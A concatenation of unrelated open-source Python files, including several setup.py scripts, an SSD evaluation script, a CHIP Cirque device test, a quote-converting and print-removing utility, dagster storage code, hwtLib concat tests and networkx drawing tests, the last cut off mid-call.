_init_file = os.path.join(os.path.abspath(os.path.dirname(__file__)), "locust", "__init__.py")
with open(_init_file, 'rb') as f:
version = str(ast.literal_eval(_version_re.search(
f.read().decode('utf-8')).group(1)))
setup(
name='locustio',
version=version,
description="Website load testing framework",
long_description="""Locust is a python utility for doing easy, distributed load testing of a web site""",
classifiers=[
"Topic :: Software Development :: Testing :: Traffic Generation",
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
],
keywords='',
author='Jonatan Heyman, Carl Bystrom, Joakim Hamrén, Hugo Heyman',
author_email='',
url='http://locust.io',
license='MIT',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
include_package_data=True,
zip_safe=False,
install_requires=["gevent>=1.2.2", "flask>=0.10.1", "requests>=2.9.1", "msgpack-python>=0.4.2", "six>=1.10.0", "pyzmq==15.2.0"],
tests_require=['unittest2', 'mock'],
entry_points={
'console_scripts': [
'locust = locust.main:main',
]
},
)
|
the-stack_0_6172 | from setuptools import setup, find_packages
with open("README.rst", "r") as fh:
long_description = fh.read()
# Get the version.
version = {}
with open("pastas/version.py") as fp:
exec(fp.read(), version)
setup(
name='pastas',
version=version['__version__'],
description='Python package to perform time series analysis of '
'hydrological time series.',
long_description=long_description,
long_description_content_type="text/x-rst",
url='https://github.com/pastas/pastas',
author='R.A. Collenteur, M. Bakker, R. Calje, F. Schaars',
author_email='[email protected], [email protected], '
'[email protected]',
project_urls={
'Source': 'https://github.com/pastas/pastas',
'Documentation': 'http://pastas.readthedocs.io/en/latest/',
'Tracker': 'https://github.com/pastas/pastas/issues',
'Help': 'https://stackoverflow.com/questions/tagged/pastas'
},
license='MIT',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Science/Research',
'Intended Audience :: Other Audience',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Topic :: Scientific/Engineering :: Hydrology',
],
platforms='Windows, Mac OS-X',
install_requires=['numpy>=1.15',
'matplotlib>=2.0',
'pandas>=0.25',
'scipy>=1.1'],
packages=find_packages(exclude=[]),
)
|
the-stack_0_6174 | import codecs
import os
import re
from setuptools import find_packages, setup
###############################################################################
NAME = "attrs"
PACKAGES = find_packages(where="src")
META_PATH = os.path.join("src", "attr", "__init__.py")
KEYWORDS = ["class", "attribute", "boilerplate"]
PROJECT_URLS = {
"Documentation": "https://www.attrs.org/",
"Bug Tracker": "https://github.com/python-attrs/attrs/issues",
"Source Code": "https://github.com/python-attrs/attrs",
}
CLASSIFIERS = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Natural Language :: English",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Libraries :: Python Modules",
]
INSTALL_REQUIRES = []
EXTRAS_REQUIRE = {
"docs": ["sphinx", "zope.interface"],
"tests": [
"coverage",
"hypothesis",
"pympler",
"pytest>=4.3.0", # 4.3.0 dropped last use of `convert`
"six",
"zope.interface",
],
}
EXTRAS_REQUIRE["dev"] = (
EXTRAS_REQUIRE["tests"] + EXTRAS_REQUIRE["docs"] + ["pre-commit"]
)
EXTRAS_REQUIRE["azure-pipelines"] = EXTRAS_REQUIRE["tests"] + [
"pytest-azurepipelines"
]
###############################################################################
HERE = os.path.abspath(os.path.dirname(__file__))
def read(*parts):
"""
Build an absolute path from *parts* and and return the contents of the
resulting file. Assume UTF-8 encoding.
"""
with codecs.open(os.path.join(HERE, *parts), "rb", "utf-8") as f:
return f.read()
META_FILE = read(META_PATH)
def find_meta(meta):
"""
Extract __*meta*__ from META_FILE.
"""
meta_match = re.search(
r"^__{meta}__ = ['\"]([^'\"]*)['\"]".format(meta=meta), META_FILE, re.M
)
if meta_match:
return meta_match.group(1)
raise RuntimeError("Unable to find __{meta}__ string.".format(meta=meta))
VERSION = find_meta("version")
URL = find_meta("url")
LONG = (
read("README.rst")
+ "\n\n"
+ "Release Information\n"
+ "===================\n\n"
+ re.search(
r"(\d+.\d.\d \(.*?\)\r?\n.*?)\r?\n\r?\n\r?\n----\r?\n\r?\n\r?\n",
read("CHANGELOG.rst"),
re.S,
).group(1)
+ "\n\n`Full changelog "
+ "<{url}en/stable/changelog.html>`_.\n\n".format(url=URL)
+ read("AUTHORS.rst")
)
if __name__ == "__main__":
setup(
name=NAME,
description=find_meta("description"),
license=find_meta("license"),
url=URL,
project_urls=PROJECT_URLS,
version=VERSION,
author=find_meta("author"),
author_email=find_meta("email"),
maintainer=find_meta("author"),
maintainer_email=find_meta("email"),
keywords=KEYWORDS,
long_description=LONG,
long_description_content_type="text/x-rst",
packages=PACKAGES,
package_dir={"": "src"},
python_requires=">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*",
zip_safe=False,
classifiers=CLASSIFIERS,
install_requires=INSTALL_REQUIRES,
extras_require=EXTRAS_REQUIRE,
include_package_data=True,
)
|
the-stack_0_6175 | from __future__ import print_function
import sys
import os
import argparse
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
import torchvision.transforms as transforms
from torch.autograd import Variable
from data import VOC_ROOT, VOC_CLASSES as labelmap
from PIL import Image
from data import VOCAnnotationTransform, VOCDetection, BaseTransform, VOC_CLASSES
import torch.utils.data as data
from ssd import build_ssd
parser = argparse.ArgumentParser(description='Single Shot MultiBox Detection')
parser.add_argument('--trained_model', default='weights/ssd_300_VOC0712.pth',
type=str, help='Trained state_dict file path to open')
parser.add_argument('--save_folder', default='eval/', type=str,
help='Dir to save results')
parser.add_argument('--visual_threshold', default=0.6, type=float,
help='Final confidence threshold')
parser.add_argument('--cuda', default=True, type=bool,
help='Use cuda to train model')
parser.add_argument('--voc_root', default=VOC_ROOT, help='Location of VOC root directory')
parser.add_argument('-f', default=None, type=str, help="Dummy arg so we can load in Jupyter Notebooks")
args = parser.parse_args()
if args.cuda and torch.cuda.is_available():
torch.set_default_tensor_type('torch.cuda.FloatTensor')
else:
torch.set_default_tensor_type('torch.FloatTensor')
if not os.path.exists(args.save_folder):
os.mkdir(args.save_folder)
def test_net(save_folder, net, cuda, testset, transform, thresh):
# dump predictions and assoc. ground truth to text file for now
filename = save_folder+'test1.txt'
num_images = len(testset)
for i in range(num_images):
print('Testing image {:d}/{:d}....'.format(i+1, num_images))
img = testset.pull_image(i)
img_id, annotation = testset.pull_anno(i)
x = torch.from_numpy(transform(img)[0]).permute(2, 0, 1)
x = Variable(x.unsqueeze(0))
with open(filename, mode='a') as f:
f.write('\nGROUND TRUTH FOR: '+img_id+'\n')
for box in annotation:
f.write('label: '+' || '.join(str(b) for b in box)+'\n')
if cuda:
x = x.cuda()
y = net(x) # forward pass
detections = y.data
# scale each detection back up to the image
scale = torch.Tensor([img.shape[1], img.shape[0],
img.shape[1], img.shape[0]])
pred_num = 0
for i in range(detections.size(1)):
j = 0
while detections[0, i, j, 0] >= 0.6:
if pred_num == 0:
with open(filename, mode='a') as f:
f.write('PREDICTIONS: '+'\n')
score = detections[0, i, j, 0]
label_name = labelmap[i-1]
pt = (detections[0, i, j, 1:]*scale).cpu().numpy()
coords = (pt[0], pt[1], pt[2], pt[3])
pred_num += 1
with open(filename, mode='a') as f:
f.write(str(pred_num)+' label: '+label_name+' score: ' +
str(score) + ' '+' || '.join(str(c) for c in coords) + '\n')
j += 1
def test_voc():
# load net
num_classes = len(VOC_CLASSES) + 1 # +1 background
if "cityscapes" in args.trained_model or "sim10k" in args.trained_model:
num_classes = 201
# VOC_CLASSES = ("car")
net = build_ssd('test', 300, num_classes) # initialize SSD
net.load_state_dict(torch.load(args.trained_model))
net.eval()
print('Finished loading model!')
# load data
testset = VOCDetection(args.voc_root, [('2007', 'test')], None, VOCAnnotationTransform())
if args.cuda:
net = net.cuda()
cudnn.benchmark = True
# evaluation
test_net(args.save_folder, net, args.cuda, testset,
BaseTransform(net.size, (104, 117, 123)),
thresh=args.visual_threshold)
if __name__ == '__main__':
test_voc()
|
the-stack_0_6178 | #!/usr/bin/env python3
"""
Copyright (c) 2021 Project CHIP Authors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import os
import pprint
import time
import sys
from helper.CHIPTestBase import CHIPVirtualHome
logger = logging.getLogger('MobileDeviceTest')
logger.setLevel(logging.INFO)
sh = logging.StreamHandler()
sh.setFormatter(
logging.Formatter(
'%(asctime)s [%(name)s] %(levelname)s %(message)s'))
logger.addHandler(sh)
CHIP_PORT = 5540
CIRQUE_URL = "http://localhost:5000"
CHIP_REPO = os.path.join(os.path.abspath(
os.path.dirname(__file__)), "..", "..", "..")
TEST_EXTPANID = "fedcba9876543210"
DEVICE_CONFIG = {
'device0': {
'type': 'MobileDevice',
'base_image': 'connectedhomeip/chip-cirque-device-base',
'capability': ['Interactive', 'TrafficControl', 'Mount'],
'rcp_mode': True,
'docker_network': 'Ipv6',
'traffic_control': {'latencyMs': 100},
"mount_pairs": [[CHIP_REPO, CHIP_REPO]],
},
'device1': {
'type': 'CHIPEndDevice',
'base_image': 'connectedhomeip/chip-cirque-device-base',
'capability': ['Thread', 'Interactive', 'TrafficControl', 'Mount'],
'rcp_mode': True,
'docker_network': 'Ipv6',
'traffic_control': {'latencyMs': 100},
"mount_pairs": [[CHIP_REPO, CHIP_REPO]],
}
}
class TestPythonController(CHIPVirtualHome):
def __init__(self, device_config):
super().__init__(CIRQUE_URL, device_config)
self.logger = logger
def setup(self):
self.initialize_home()
def test_routine(self):
self.run_controller_test()
def run_controller_test(self):
ethernet_ip = [device['description']['ipv6_addr'] for device in self.non_ap_devices
if device['type'] == 'CHIPEndDevice'][0]
server_ids = [device['id'] for device in self.non_ap_devices
if device['type'] == 'CHIPEndDevice']
req_ids = [device['id'] for device in self.non_ap_devices
if device['type'] == 'MobileDevice']
for server in server_ids:
self.execute_device_cmd(server, "CHIPCirqueDaemon.py -- run {} --thread".format(
os.path.join(CHIP_REPO, "out/debug/standalone/chip-lighting-app")))
self.reset_thread_devices(server_ids)
req_device_id = req_ids[0]
self.execute_device_cmd(req_device_id, "pip3 install {}".format(os.path.join(
CHIP_REPO, "out/debug/linux_x64_gcc/controller/python/chip-0.0-cp37-abi3-linux_x86_64.whl")))
command = "gdb -return-child-result -q -ex run -ex bt --args python3 {} -t 75 -a {}".format(
os.path.join(
CHIP_REPO, "src/controller/python/test/test_scripts/mobile-device-test.py"),
ethernet_ip)
ret = self.execute_device_cmd(req_device_id, command)
self.assertEqual(ret['return_code'], '0',
"Test failed: non-zero return code")
# Check if the device is in thread network.
self.check_device_thread_state(
server_ids[0], expected_role=['leader'], timeout=5)
# Check if the device is attached to the correct thread network.
for device_id in server_ids:
reply = self.execute_device_cmd(device_id, 'ot-ctl extpanid')
self.assertEqual(reply['output'].split()[0].strip(), TEST_EXTPANID)
# Check if device can be controlled by controller
for device_id in server_ids:
self.logger.info("checking device log for {}".format(
self.get_device_pretty_id(device_id)))
self.assertTrue(self.sequenceMatch(self.get_device_log(device_id).decode('utf-8'), ["LightingManager::InitiateAction(ON_ACTION)", "LightingManager::InitiateAction(OFF_ACTION)", "No Cluster 0x0000_0006 on Endpoint 0xe9"]),
"Datamodel test failed: cannot find matching string from device {}".format(device_id))
if __name__ == "__main__":
sys.exit(TestPythonController(DEVICE_CONFIG).run_test())
|
the-stack_0_6180 | import re
from pathlib import Path
# Local modules
try:
from .checker import checker
except ImportError:
from checker import checker
try:
from .helpers import checkBrackets
except ImportError:
from helpers import checkBrackets
###################### REGULAR EXPRESSIONS ######################
skip_a_line = re.compile(r".*") # Skipping a line (upto the newline character)
multiline_comments = re.compile(
r"""('''|\"\"\")
(.*?) # Any number of lines between the comments including newline characters
('''|\"\"\")""",
re.DOTALL | re.VERBOSE,
)
# Regex checking for a whole print statement
print_checker = re.compile(r"([ \t]*print)(\(.*\))([ \t]*)", re.DOTALL)
comments = re.compile(r"[ \t]*(#|'''|\"\"\")")
hash_comments = re.compile(r"[ \t]*#")
# To check if mulitiline comments start from here
multiline_comments_start_spc = re.compile(r"[ \t]*('''|\"\"\")")
# For checking a whole multiline comment
multiline_comments_spc = re.compile(r"[ \t]*('''.*'''|\"\"\".*\"\"\")[ \t]*", re.DOTALL)
blank_line = re.compile(r"^[ \t]*$")
re_indentation = re.compile(r"([ \t]+)(.)")
#################################################################
def convert_quotes_slave(filepath: Path, single: bool = True) -> bool:
"""
Helper function to convert the quotes in file
Args:
filepath: A path object pointing to path of the file to convert
single: A boolean value signifying True if convert quotes to single quotes and False for double quotes
Returns:
True if the file is converted to desired quotes without any syntactitcal errors
"""
# Opening the file and checking for any syntactical errors
try:
with open(filepath, "r", encoding="utf-8") as file:
data = file.read()
if not checker(data, False):
return (False, filepath)
except UnicodeDecodeError:
return (False, filepath)
# Desired quotes in the file
dest = "'" if single else '"'
new_file_content = ""
quotes = ('"', "'")
i = 0
while i < len(data):
# If a hashed comment occurs, no need to check the comment string for quotes
if data[i] == "#":
hashed_comment = re.match(skip_a_line, data[i:])
new_file_content += data[i : i + hashed_comment.span()[1]]
# Skip the characters in the comment upto newline
i = i + hashed_comment.span()[1]
# Main condition: If a quote is encountered
elif data[i] in quotes:
# Check if it is a docstring
matched_comments = re.match(multiline_comments, data[i:])
if matched_comments:
# Replacing the docstring quotes with the desired quotes
new_file_content += dest * 3 + matched_comments.group(2) + dest * 3
i += matched_comments.span()[1] # Skip the docstring
else:
ends = data[i] # Start of the string
new_file_content += dest # Replace the quote with the desired quote
i += 1
# Go upto the end of string
while data[i] != ends:
# This condition is used so that we do not check the escape character
# Mainly used for these cases:
# i) If the next character is a backslash
# ii) If the next character is a quote
if data[i] == "\\":
new_file_content += data[i]
i += 1
# If a destination quote occurs in the string escape it
elif data[i] == dest:
new_file_content += "\\"
new_file_content += data[i]
i += 1
new_file_content += dest # Close the string
i += 1
if i < len(data):
new_file_content += data[i]
i += 1
# Check the result if it contains any syntactical errors
if checker(new_file_content, False):
try:
with open(filepath, "w", encoding="utf-8") as file:
file.write(new_file_content)
except UnicodeEncodeError:
return (False, filepath)
return (True, filepath)
else:
return (False, filepath)
def rmv_prints_slave(
filepath: Path,
rmv_main: bool = True,
rmv_root: bool = True,
funcs_to_spare: list = None,
) -> int:
"""
Function which will change the file and remove print statements from print
Args:
filepath: A path object pointing to path of the file
rmv_main: True if print statements has to be removed from main function else False
rmv_root: True if print statements has to be removed from global scope (level 0 indentation) else False
funcs_to_spare: List of functions to be ignored in a file
Return:
An integer which has the following cases:
0: Print statements could not be removed due to syntactical errors
1: Print statements were removed from the file successfully
2: There were no print statements in the file hence, no change
"""
if funcs_to_spare == None:
funcs_to_spare = list()
# main() is used by many programmers, so for standard puposes we do this
if rmv_main == False:
funcs_to_spare.append("main")
there_are_functions_to_spare = True
if len(funcs_to_spare) == 0:
there_are_functions_to_spare = False
else:
# Get a string in the form of "(func 1|func 2|func 3|....|func n)" to be used in the regex
function_identifiers = "("
for i in range(len(funcs_to_spare)):
function_identifiers += funcs_to_spare[i] + "|"
function_identifiers = function_identifiers[0:-1] + ")"
if rmv_main == False:
re_spare_funcs = re.compile(
r"(if(\(|\s)*__name__\s*==\s*('|\")__main__('|\")(\)|\s)*:)|([ \t]*def[ ]+"
+ function_identifiers
+ r"\s*\(.*\).*?:)",
)
elif there_are_functions_to_spare:
re_spare_funcs = re.compile(
r"[ \t]*def[ ]+" + function_identifiers + r"\s*\(.*\).*?:"
)
if rmv_root == True:
line_contains_print = re.compile(r"[ \t]*print\(")
else:
line_contains_print = re.compile(r"[ \t]+print\(")
# Opening the file and checking for any syntactical errors
try:
with open(filepath, "r", encoding="utf-8") as file:
data = file.readlines()
if not checker(filepath, True):
return (0, filepath)
except UnicodeDecodeError:
return (0, filepath)
current_line = 0
lines_in_file = len(data)
new_file_content = ""
change = False # A variable to know if there were any print statements in file
while current_line < len(data):
# If any comment is encountered
if re.match(comments, data[current_line]):
# Go through the multiline docstring until its end
if re.match(multiline_comments_start_spc, data[current_line]):
end = current_line
cur_comment = data[current_line]
while not re.match(multiline_comments_spc, cur_comment):
end += 1
cur_comment += data[end]
new_file_content += cur_comment
current_line = end
else:
new_file_content += data[current_line]
# If a function definition is encountered and it is a function to be ignored for checking of print statements, skip it
elif there_are_functions_to_spare and re.match(
re_spare_funcs, data[current_line]
):
function_end = re.match(re_spare_funcs, data[current_line]).span()[1]
# Check whether this is not a one-line function
# eg. def a(b): return b*3
if function_end == len(data[current_line]) or re.match(
blank_line, data[current_line][function_end:]
):
# In function body, skip the blank lines and comments to find the indentation of the function
end = current_line + 1
while end < lines_in_file and (
re.match(hash_comments, data[end])
or re.match(blank_line, data[end])
):
end += 1
if end < lines_in_file:
# First ordinary line of function, get the indentation level
indentation = re.match(re_indentation, data[end])
no_of_spaces = len(indentation.group(1))
block_text = re.compile(r"[ \t]{" + str(no_of_spaces) + r",}.")
# Go through the function with the at least the current indentation
while end < lines_in_file and (
re.match(hash_comments, data[end])
or re.match(blank_line, data[end])
or re.match(block_text, data[end])
):
end += 1
new_file_content += "".join(data[current_line:end])
current_line = end - 1
# If a print statement is encountered, remove it
elif re.match(line_contains_print, data[current_line]):
# Print statement is encountered hence, file needs to be changed
change = True
end = current_line
print_statement = re.match(print_checker, data[current_line])
current_print = data[current_line]
# If the print statement is incomplete or a matching bracket is found in the statement,
# check if the print statement is complete
while end < lines_in_file and (
print_statement == None
or checkBrackets(print_statement.group(2)) == False
):
end += 1
current_print += data[end]
print_statement = re.match(print_checker, current_print)
current_line = end
# If all of the above cases are not true, this is a regular line just append it to the file content
else:
new_file_content += data[current_line]
current_line += 1
if checker(new_file_content, False):
# No print in the file was noticed, hence no need to write anything to the file
if not change:
return (2, filepath)
try:
with open(filepath, "w", encoding="utf-8") as file:
file.write(new_file_content)
except UnicodeEncodeError:
return (0, filepath)
return (1, filepath)
else:
return (0, filepath)
if __name__ == "__main__":
convert_quotes_slave(
"C:/Users/DELL/OneDrive/Desktop/wrapup/wrapup/filepath.py",
single=False,
)
|
the-stack_0_6181 | from abc import ABCMeta
import six
from dagster import check
from dagster.core.execution.context.system import SystemPipelineExecutionContext
from dagster.core.types.dagster_type import DagsterType, resolve_dagster_type
from .object_store import FilesystemObjectStore, ObjectStore
from .type_storage import TypeStoragePluginRegistry
class IntermediateStore(six.with_metaclass(ABCMeta)):
def __init__(self, object_store, root_for_run_id, run_id, type_storage_plugin_registry):
self.root_for_run_id = check.callable_param(root_for_run_id, 'root_for_run_id')
self.run_id = check.str_param(run_id, 'run_id')
self.object_store = check.inst_param(object_store, 'object_store', ObjectStore)
self.type_storage_plugin_registry = check.inst_param(
type_storage_plugin_registry, 'type_storage_plugin_registry', TypeStoragePluginRegistry
)
@property
def root(self):
return self.root_for_run_id(self.run_id)
def uri_for_paths(self, paths, protocol=None):
check.list_param(paths, 'paths', of_type=str)
check.param_invariant(len(paths) > 0, 'paths')
key = self.key_for_paths(paths)
return self.object_store.uri_for_key(key, protocol)
def key_for_paths(self, paths):
return self.object_store.key_for_paths([self.root] + paths)
def set_object(self, obj, context, dagster_type, paths):
check.opt_inst_param(context, 'context', SystemPipelineExecutionContext)
check.inst_param(dagster_type, 'dagster_type', DagsterType)
check.list_param(paths, 'paths', of_type=str)
check.param_invariant(len(paths) > 0, 'paths')
key = self.object_store.key_for_paths([self.root] + paths)
return self.object_store.set_object(
key, obj, serialization_strategy=dagster_type.serialization_strategy
)
def get_object(self, context, dagster_type, paths):
check.opt_inst_param(context, 'context', SystemPipelineExecutionContext)
check.list_param(paths, 'paths', of_type=str)
check.param_invariant(len(paths) > 0, 'paths')
check.inst_param(dagster_type, 'dagster_type', DagsterType)
key = self.object_store.key_for_paths([self.root] + paths)
return self.object_store.get_object(
key, serialization_strategy=dagster_type.serialization_strategy
)
def has_object(self, context, paths):
check.opt_inst_param(context, 'context', SystemPipelineExecutionContext)
check.list_param(paths, 'paths', of_type=str)
check.param_invariant(len(paths) > 0, 'paths')
key = self.object_store.key_for_paths([self.root] + paths)
return self.object_store.has_object(key)
def rm_object(self, context, paths):
check.opt_inst_param(context, 'context', SystemPipelineExecutionContext)
check.list_param(paths, 'paths', of_type=str)
check.param_invariant(len(paths) > 0, 'paths')
key = self.object_store.key_for_paths([self.root] + paths)
self.object_store.rm_object(key)
def copy_object_from_prev_run(self, _context, previous_run_id, paths):
check.str_param(previous_run_id, 'previous_run_id')
check.list_param(paths, 'paths', of_type=str)
check.param_invariant(len(paths) > 0, 'paths')
src = self.object_store.key_for_paths([self.root_for_run_id(previous_run_id)] + paths)
dst = self.object_store.key_for_paths([self.root] + paths)
return self.object_store.cp_object(src, dst)
def set_value(self, obj, context, dagster_type, paths):
if self.type_storage_plugin_registry.is_registered(dagster_type):
return self.type_storage_plugin_registry.get(dagster_type.name).set_object(
self, obj, context, dagster_type, paths
)
elif dagster_type.name is None:
self.type_storage_plugin_registry.check_for_unsupported_composite_overrides(
dagster_type
)
return self.set_object(obj, context, dagster_type, paths)
def get_value(self, context, dagster_type, paths):
if self.type_storage_plugin_registry.is_registered(dagster_type):
return self.type_storage_plugin_registry.get(dagster_type.name).get_object(
self, context, dagster_type, paths
)
elif dagster_type.name is None:
self.type_storage_plugin_registry.check_for_unsupported_composite_overrides(
dagster_type
)
return self.get_object(context, dagster_type, paths)
@staticmethod
def paths_for_intermediate(step_key, output_name):
return ['intermediates', step_key, output_name]
def get_intermediate(self, context, step_key, dagster_type, output_name='result'):
return self.get_object(
context=context,
dagster_type=resolve_dagster_type(dagster_type),
paths=self.paths_for_intermediate(step_key, output_name),
)
def has_intermediate(self, context, step_key, output_name='result'):
return self.has_object(
context=context, paths=self.paths_for_intermediate(step_key, output_name)
)
def rm_intermediate(self, context, step_key, output_name='result'):
return self.rm_object(
context=context, paths=self.paths_for_intermediate(step_key, output_name)
)
def build_fs_intermediate_store(root_for_run_id, run_id, type_storage_plugin_registry=None):
return IntermediateStore(
FilesystemObjectStore(),
root_for_run_id,
run_id,
type_storage_plugin_registry
if type_storage_plugin_registry
else TypeStoragePluginRegistry(types_to_register=[]),
)
|
the-stack_0_6185 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from math import ceil
from typing import Dict
import unittest
from hwt.code import Concat
from hwt.hdl.constants import WRITE, READ, NOP
from hwt.hdl.types.bits import Bits
from hwt.simulator.simTestCase import SimTestCase
from hwtLib.examples.operators.concat import SimpleConcat, ConcatAssign, \
ConcatIndexAssignMix0, ConcatIndexAssignMix1, ConcatIndexAssignMix2, \
ConcatIndexAssignMix3
from hwtLib.types.net.arp import arp_ipv4_t
from hwtSimApi.constants import CLK_PERIOD
from pyMathBitPrecise.bit_utils import get_bit, mask
def addValues(unit, data):
for d in data:
# because there are 4 bits
for i in range(4):
databit = getattr(unit, f"a{i:d}")
if d is None:
dataBitval = None
else:
dataBitval = get_bit(d, i)
databit._ag.data.append(dataBitval)
class ConcatTC(SimTestCase):
def tearDown(self):
self.rmSim()
SimTestCase.tearDown(self)
def test_join(self):
u = SimpleConcat()
self.compileSimAndStart(u)
# addValues(u, [0, 1, 2, 4, 8, (1 << 4) - 1, None, 3, 2, 1])
addValues(u, [2, 4, (1 << 4) - 1, None, 3, 2, 1])
self.runSim(7 * CLK_PERIOD)
self.assertValSequenceEqual(u.a_out._ag.data,
[2, 4, 15, None, 3, 2, 1])
def test_assign(self):
u = ConcatAssign()
self.compileSimAndStart(u)
N = 4
a = [[] for _ in range(N)]
for i in range(N):
for i2, bit_ref_vals in enumerate(a):
bit_ref_vals.append(int(i == i2))
u.a_in._ag.data.append(1 << i)
self.runSim(N * CLK_PERIOD)
for i, bit_ref_vals in enumerate(a):
data = getattr(u, f'a{i:d}')._ag.data
self.assertValSequenceEqual(data, bit_ref_vals)
def test_ConcatIndexAssignMix0(self):
u = ConcatIndexAssignMix0()
self.compileSimAndStart(u)
N = 4
a = [[] for _ in range(N)]
for i in range(N):
for i2, bit_ref_vals in enumerate(a):
bit_ref_vals.append(int(i == i2))
v = 1 << i
u.a[0]._ag.data.append(v & 0x3)
u.a[1]._ag.data.append((v >> 2) & 0x3)
self.runSim(N * CLK_PERIOD)
for i, bit_ref_vals in enumerate(a):
data = u.b[i]._ag.data
self.assertValSequenceEqual(data, bit_ref_vals)
def test_ConcatIndexAssignMix1(self):
u = ConcatIndexAssignMix1()
self.compileSimAndStart(u)
N = 4
b = [[] for _ in range(2)]
for i in range(N):
for i2, a in enumerate(u.a):
a._ag.data.append(int(i == i2))
v = 1 << i
b[0].append(v & 0x3)
b[1].append((v >> 2) & 0x3)
self.runSim(N * CLK_PERIOD)
for i, ref_vals in enumerate(b):
self.assertValSequenceEqual(u.b[i]._ag.data, ref_vals)
def test_ConcatIndexAssignMix2(self):
u = ConcatIndexAssignMix2()
self.compileSimAndStart(u)
N = 8
b = [[] for _ in range(2)]
for i in range(N):
offset = 0
v = 1 << i
for a in u.a:
w = a._dtype.bit_length()
a._ag.data.append((v >> offset) & mask(w))
offset += w
b[0].append(v & 0xf)
b[1].append((v >> 4) & 0xf)
self.runSim(N * CLK_PERIOD)
for i, ref_vals in enumerate(b):
self.assertValSequenceEqual(u.b[i]._ag.data, ref_vals)
def _ConcatIndexAssignMix3_py_val_to_words(self, v:Dict[str, int], W: int, WORD_CNT: int):
d = arp_ipv4_t.from_py(v)
padding_w = WORD_CNT * 24 - W
d_words = Concat(Bits(padding_w).from_py(0), d._reinterpret_cast(Bits(W)))\
._reinterpret_cast(Bits(24)[WORD_CNT])
return d_words
def test_ConcatIndexAssignMix3(self):
u = ConcatIndexAssignMix3()
self.compileSimAndStart(u)
W = arp_ipv4_t.bit_length()
WORD_CNT = ceil(W / 24)
D1 = self._ConcatIndexAssignMix3_py_val_to_words(
{f.name: i + 1 for i, f in enumerate(arp_ipv4_t.fields)}, W, WORD_CNT)
u.port._ag.requests.extend([
NOP, NOP,
*((READ, i) for i in range(WORD_CNT)),
*((WRITE, i, v) for i, v in enumerate(D1)),
*((READ, i) for i in range(WORD_CNT)),
])
self.runSim((len(u.port._ag.requests) + 4) * CLK_PERIOD)
D0 = self._ConcatIndexAssignMix3_py_val_to_words(
{f.name: i for i, f in enumerate(arp_ipv4_t.fields)}, W, WORD_CNT)
r_data = list(u.port._ag.r_data)
self.assertValSequenceEqual(r_data[0:WORD_CNT] + r_data[2 * WORD_CNT:], [int(d) for d in (list(D0) + list(D1))])
if __name__ == "__main__":
suite = unittest.TestSuite()
# suite.addTest(IndexingTC('test_rangeJoin'))
suite.addTest(unittest.makeSuite(ConcatTC))
runner = unittest.TextTestRunner(verbosity=3)
runner.run(suite)
|
the-stack_0_6187 | """Unit tests for matplotlib drawing functions."""
import os
import itertools
import pytest
mpl = pytest.importorskip("matplotlib")
mpl.use("PS")
plt = pytest.importorskip("matplotlib.pyplot")
plt.rcParams["text.usetex"] = False
import networkx as nx
barbell = nx.barbell_graph(4, 6)
def test_draw():
try:
functions = [
nx.draw_circular,
nx.draw_kamada_kawai,
nx.draw_planar,
nx.draw_random,
nx.draw_spectral,
nx.draw_spring,
nx.draw_shell,
]
options = [{"node_color": "black", "node_size": 100, "width": 3}]
for function, option in itertools.product(functions, options):
function(barbell, **option)
plt.savefig("test.ps")
finally:
try:
os.unlink("test.ps")
except OSError:
pass
def test_draw_shell_nlist():
try:
nlist = [list(range(4)), list(range(4, 10)), list(range(10, 14))]
nx.draw_shell(barbell, nlist=nlist)
plt.savefig("test.ps")
finally:
try:
os.unlink("test.ps")
except OSError:
pass
def test_edge_colormap():
colors = range(barbell.number_of_edges())
nx.draw_spring(
barbell,
edge_color=colors,
width=4,
edge_cmap=plt.cm.Blues,
with_labels=True,
)
# plt.show()
def test_arrows():
nx.draw_spring(barbell.to_directed())
# plt.show()
def test_edge_colors_and_widths():
pos = nx.circular_layout(barbell)
for G in (barbell, barbell.to_directed()):
nx.draw_networkx_nodes(G, pos, node_color=[(1.0, 1.0, 0.2, 0.5)])
nx.draw_networkx_labels(G, pos)
# edge with default color and width
nx.draw_networkx_edges(G, pos, edgelist=[(0, 1)], width=None, edge_color=None)
# edges with global color strings and widths in lists
nx.draw_networkx_edges(
G, pos, edgelist=[(0, 2), (0, 3)], width=[3], edge_color=["r"]
)
# edges with color strings and widths for each edge
nx.draw_networkx_edges(
G, pos, edgelist=[(0, 2), (0, 3)], width=[1, 3], edge_color=["r", "b"]
)
# edges with fewer color strings and widths than edges
nx.draw_networkx_edges(
G,
pos,
edgelist=[(1, 2), (1, 3), (2, 3), (3, 4)],
width=[1, 3],
edge_color=["g", "m", "c"],
)
# edges with more color strings and widths than edges
nx.draw_networkx_edges(
G,
pos,
edgelist=[(3, 4)],
width=[1, 2, 3, 4],
edge_color=["r", "b", "g", "k"],
)
# with rgb tuple and 3 edges - is interpreted with cmap
nx.draw_networkx_edges(
